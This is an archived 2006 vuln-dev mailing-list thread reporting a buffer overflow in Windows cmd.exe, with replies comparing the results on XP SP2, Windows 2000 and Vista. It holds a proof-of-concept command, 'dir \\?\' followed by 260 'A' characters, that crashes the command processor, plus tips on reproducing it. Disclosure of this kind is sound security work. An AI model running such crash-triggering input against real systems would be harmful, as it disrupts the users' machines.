Vulnerability Development mailing list archives

RE: Windows Command Processor CMD.EXE Buffer Overflow

From: "gregory_panakkal" <gregory_panakkal () fastmail fm>
Date: Sat, 21 Oct 2006 17:52:53 +0530

Hi,

I had tested on couple of winxp sp2 fully patched systems, DEP came into
the picture.
On Win2k - the cmd.exe immediately terminates; on vista - no issues - it
throws up a proper error.

just for clarifying if you executed the command properly -- "\\?\" is
required after dir cmd.. and not
one with the single slash "\?\". to reproduce the issue in winxp sp2,
copy page the command from my original
mail into a notepad instance; remove the unnecessary line-breaks to make
it a single line command. now, copy-paste
this line into an instance of the command processor and execute it.


On Fri, 20 Oct 2006 15:51:17 -0700, "Marvin Simkin"
<Marvin.Simkin () asu edu> said:

WXPSP2 fully patched:

C:\>ver

Microsoft Windows XP [Version 5.1.2600]

C:\>%COMSPEC% /K "dir
\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
The filename or extension is too long.

C:\>

... but then, all the command history is lost; you cannot arrow-up to
repeat the command.




-----Original Message-----
From: listbounce () securityfocus com on behalf of Osvaldo Casagrande
Sent: Fri 2006-10-20 04:51
To: gregory_panakkal; vuln-dev () securityfocus com
Subject: RE: Windows Command Processor CMD.EXE Buffer Overflow
 
It does not works on Windows Vista RC1 (5728)


Osvaldo Casagrande 
MCSE. MCT, MVP, Security+
Gerente de Servicios 
DiviServ S.A.
D: 595(21) 613 828 | Cel. 595 (971) 300 836 | |: ocasagrande () diviserv com
|  Add me to messenger

Busca mis referencias? / Looking for my personal references?
Acces to Programa MVP - Access to Certificaciones MS On "Transcript ID"
input: 740381 / On "Access Code" input: ViewMyInfo

Running Windows Vista RC1- Build 5728 and Office 2007 Beta 2 TR

CONFIDENCIALIDAD: La informacion contenida en este mail y sus anexos es
confidencial y/o privilegiada y esta reservada para el destinatario
unicamente.  Si usted no es el destinatario o un agente responsable de
enviar este mensaje al destinatario final, se le notifica que: No puede
utilizarlo, retransmitirlo, imprimirlo, copiarlo o divulgar las
informaciones contenidas en este mail o sus anexos o tomar cualquier
accion basada en estas informaciones. Si usted recibe este mensaje por
error, por favor avise inmediatamente al remitente, y tenga la amabilidad
de borrarlo de su computadora o cualquier otro banco de datos. DIVISERV
agradece su cooperacion. 

This mail message may contain confidential and/or privileged information
for the adressee. If you are not the addressee or authorized to receive
this for the addressee, you must not use, copy, print, retransmit,
disclose or take any action based on this message or any information
herein. If you have received this message by mistake, please advise the
sender immediately replying this message and delete it from your computer
and any database. DIVISERV appreciates your cooperation.

-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com]
On Behalf Of gregory_panakkal
Sent: Wednesday, October 18, 2006 11:33 PM
To: vuln-dev () securityfocus com
Subject: Windows Command Processor CMD.EXE Buffer Overflow


Windows Command Processor CMD.EXE Buffer Overflow
Tested on WinXP SP2
Impact - Very Low


Copy-paste the following line in cmd.exe and execute it..
(it is a single command, has been split into multiple lines for
readability sake).

%COMSPEC% /K "dir
\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

(260 characters of 'A's)

DEP Comes into the picture.

URL :
http://www.infogreg.com/security/misc/windows-command-processor-cmd.exe-buffer-overflow.html

regards,
Gregory Panakkal
www.infogreg.com
-- 
  gregory_panakkal
  gregory_panakkal () fastmail fm

-- 
http://www.fastmail.fm - I mean, what is it about a decent email service?

-- 
  gregory_panakkal
  gregory_panakkal () fastmail fm

-- 
http://www.fastmail.fm - A fast, anti-spam email service.

Current thread:

Windows Command Processor CMD.EXE Buffer Overflow gregory_panakkal (Oct 19)
- Re: Windows Command Processor CMD.EXE Buffer Overflow The SNiFF (Oct 20)
  - RE: Windows Command Processor CMD.EXE Buffer Overflow Luis Alberto Cortes Zavala (Oct 21)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Osvaldo Casagrande (Oct 20)
  - RE: Windows Command Processor CMD.EXE Buffer Overflow Marvin Simkin (Oct 21)
    - RE: Windows Command Processor CMD.EXE Buffer Overflow Marvin Simkin (Oct 21)
    - RE: Windows Command Processor CMD.EXE Buffer Overflow gregory_panakkal (Oct 21)
    - Re: Windows Command Processor CMD.EXE Buffer Overflow Dan Yefimov (Oct 22)
    - RE: Windows Command Processor CMD.EXE Buffer Overflow Luis Alberto Cortes Zavala (Oct 22)
    - Re: Windows Command Processor CMD.EXE Buffer Overflow Dan Yefimov (Oct 23)
    - Re: Windows Command Processor CMD.EXE Buffer Overflow Danux (Oct 23)
    - RE: Windows Command Processor CMD.EXE Buffer Overflow Marvin Simkin (Oct 23)
  - RE: Windows Command Processor CMD.EXE Buffer Overflow RockyH (Oct 21)
- Message not available
  - Re: Windows Command Processor CMD.EXE Buffer Overflow Bernardo Wernesback (Oct 23)
- <Possible follow-ups>
- Re: Re: Windows Command Processor CMD.EXE Buffer Overflow mr . dan . friedman (Oct 24)